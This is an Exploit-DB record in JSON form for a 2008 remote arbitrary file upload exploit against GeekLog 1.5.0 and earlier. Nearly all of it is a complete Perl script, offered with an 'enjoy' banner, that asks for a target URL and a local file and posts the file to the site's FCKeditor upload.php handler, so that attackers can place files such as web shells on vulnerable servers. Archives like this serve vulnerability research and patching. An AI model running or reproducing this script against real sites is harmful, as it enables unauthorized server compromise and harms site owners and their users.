GeekLog <= 1.5.0 - Remote Arbitrary File Upload Exploit

{"bulletinFamily": "exploit", "id": "EDB-ID:6306", "cvelist": [], "modified": "2008-08-25T00:00:00", "lastseen": "2016-01-31T23:36:22", "edition": 1, "sourceData": "#!/usr/bin/perl\n\nuse warnings;\nuse strict;\nuse LWP::UserAgent;\nuse HTTP::Request::Common;\n\nprint <<INTRO;\n+++++++++++++++++++++++++++++++++++++++++++++++++++++\n+ GeekLog <= 1.5.0 Remote Arbitrary File Upload +\n+ +\n+ Discovered && Coded By: t0pP8uZz +\n+ +\n+ 0day?!?Most sites need custom configuration files +\n+ for this exploit to actually work, anyway enjoy +\n+ +\n+ Discovered On: 20 August 2008 / milw0rm.com +\n+ +\n+ Script Download: http://www.geeklog.net +\n+++++++++++++++++++++++++++++++++++++++++++++++++++++\n\nINTRO\n\nprint \"Enter URL(ie: http://site.com): \";\n chomp(my $url=<STDIN>);\n \nprint \"Enter File Path(path to local file to upload): \";\n chomp(my $file=<STDIN>);\n\nmy $ua = LWP::UserAgent->new;\nmy $re = $ua->request(POST $url.'/fckeditor/editor/filemanager/upload/php/upload.php',\n Content_Type => 'form-data',\n Content => [ NewFile => $file ] );\n\nif($re->is_success) {\n if( index($re->content, \"Disabled\") != -1 ) { print \"Exploit Successfull! File Uploaded!\\n\"; }\n else { print \"File Upload Is Disabled! Failed!\\n\"; }\n} else { print \"HTTP Request Failed!\\n\"; }\n\nexit;\n\n# milw0rm.com [2008-08-25]\n", "published": "2008-08-25T00:00:00", "href": "https://www.exploit-db.com/exploits/6306/", "osvdbidlist": ["57476"], "reporter": "t0pP8uZz", "hash": "9738bf2563da5c99e0c30ab89e2394f9639510ff132b7f6c132120f65676b7f3", "title": "GeekLog <= 1.5.0 - Remote Arbitrary File Upload Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "GeekLog <= 1.5.0 Remote Arbitrary File Upload Exploit. Webapps exploit for php platform", "references": [], "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/6306/", "enchantments": {"vulnersScore": 6.5}}